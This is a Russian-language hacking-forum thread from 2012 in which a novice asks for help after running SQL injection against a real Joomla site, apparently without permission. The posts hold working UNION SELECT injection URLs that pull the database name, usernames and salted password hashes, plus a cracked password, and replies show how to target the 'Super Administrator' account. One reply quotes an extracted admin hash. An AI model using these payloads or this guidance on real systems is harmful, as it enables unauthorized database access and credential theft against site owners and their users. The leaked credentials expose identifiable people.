HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.06.2012, 15:01
Cmexo3aBp
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами: 7523606

Репутация: 0
По умолчанию

Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.

Есть пациент:

Цитата:
Сообщение от None  
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:

Цитата:
Сообщение от None  
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20c oncat(0x7e,0x27,unhex(Hex(cast(database()%20as%20c har))),0x27,0x7e)--+a
Узнаю что название базы данных - ipenza_giperion

Далее вытаскиваем логин администратора следующим образом:

Цитата:
Сообщение от None  
index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .username%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a
Узнаю что он у нас оказывается: Trav

Далее вытаскиваем пасс ( он вроде как должен быть в хэше)

Цитата:
Сообщение от None  
/index.php?option=com_discussions&view=thread&catid =14%3Aberserk&thread=1'%20union%20all%20select%20( select%20concat(0x7e,0x27,unhex(Hex(cast(jos_users .password%20as%20char))),0x27,0x7e)%20from%20`ipen za_giperion`.jos_users%20Order%20by%20username%20l imit%200,1)%20--+a#
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM

После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...

Итак что имеем:

Логин Администратора: Trav

Пароль Администратора: 489341282

Заходим в http:///administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....

Вот где я ошибся ?
 
Ответить с цитированием

  #2  
Старый 20.06.2012, 15:12
Mr.Snuffer
Участник форума
Регистрация: 02.07.2010
Сообщений: 140
С нами: 8348726

Репутация: 0
По умолчанию

Цитата:
Сообщение от Cmexo3aBp  
Вообщем мне требуется помощь. Я немого не допонимаю суть SQL инъекций видимо просто но все же опишу свою проблему и буду рад если кто поможет дельными советами.
Есть пациент:
НАм требуется узнать имя базы данных в которой лежат Логин и пароль администратора делаю это вот так:
Узнаю что название базы данных - ipenza_giperion
Далее вытаскиваем логин администратора следующим образом:
Узнаю что он у нас оказывается: Trav
Далее вытаскиваем пасс ( он вроде как должен быть в хэше)
Наш пароль зашифрован и выглядит вот так: 404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3qsZ4eIP IBYoQ2j4denG7nM
После долгих изучений как расшифровать пароли решил попробывать перебором в пассвордпро .... и о софтинка помогла и разгадала пароль...
Итак что имеем:
Логин Администратора: Trav
Пароль Администратора: 489341282
Заходим в http://giperion.pro/administrator/ вводим то что нашли ....ииииии как нистранно неподходит что то....
Вот где я ошибся ?
Где ты умудрился такой пасс раздекодить? oO
 
Ответить с цитированием

  #3  
Старый 20.06.2012, 15:13
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

concat_ws(0x3a,username,password)

вместо отдельных jos_users.password и jos_users.username
 
Ответить с цитированием

  #4  
Старый 20.06.2012, 15:14
Cmexo3aBp
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами: 7523606

Репутация: 0
По умолчанию



Ну как то так получилось
 
Ответить с цитированием

  #5  
Старый 20.06.2012, 15:20
Cmexo3aBp
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами: 7523606

Репутация: 0
По умолчанию

Цитата:
Сообщение от попугай  
concat_ws(0x3a,username,password)
вместо отдельных jos_users.password и jos_users.username
Огромное спасибо оказывается все чуть попроще можно сделать было. Но сути не поменяло это

Цитата:
Сообщение от None  
option=com_discussions&view=thread&catid=14%3Abers erk&thread=1'%20union%20all%20select%20(select%20c oncat_ws(0x3a,username,password)%20from%20`ipenza_ giperion`.jos_users%20Order%20by%20username%20limi t%200,1)%20--+a%200,1)%20--+a
Вот запрос который вы предложили.

Получил я на него следующее:

.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM

Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку

Однако доступ на форум я получил. Следовательно я считаю что пароль и логин этот от учетной записи на форуме. Но в упор не понимаю как вытащить пароль и логин от админки.
 
Ответить с цитированием

  #6  
Старый 20.06.2012, 15:26
Cmexo3aBp
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами: 7523606

Репутация: 0
По умолчанию

Цитата:
Сообщение от Nightmarе  
admin:295cf2af1b061ba92e177c9142b5a158:0Nk1f1OCEPN vSCWl8c9JgQeZSO8Hygty:Super Administrator
Пояснение:
Админа жумлы мы выводим запросом: where usertype='Super Administrator'
а не первого попавшегося лимитом.
Тьфу блин..... Преблагодарен вам очень.
 
Ответить с цитированием

  #7  
Старый 20.06.2012, 15:26
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Cmexo3aBp  
Огромное спасибо
оказывается все чуть попроще можно сделать было. Но сути не поменяло это
Вот запрос который вы предложили.
Получил я на него следующее:
.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM
Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку
Значит это не админский акк. Так как ты упорядочил по username.

20Order%20by%20username

То, вначале тебе вывелся этот юзер с точкой в нике.

Убери упорядочение или выведи непосредственно админов. при помощи

where usertype like '%admin%'
 
Ответить с цитированием

  #8  
Старый 20.06.2012, 15:36
Cmexo3aBp
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами: 7523606

Репутация: 0
По умолчанию

http://gyazo.com/66217d4a031316f6ae037bed425ffd56

Вы апсолютно правы. Спасибо огромное за помощь. Подотру урл сайта дабы избежать конфликтов с владельцем.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.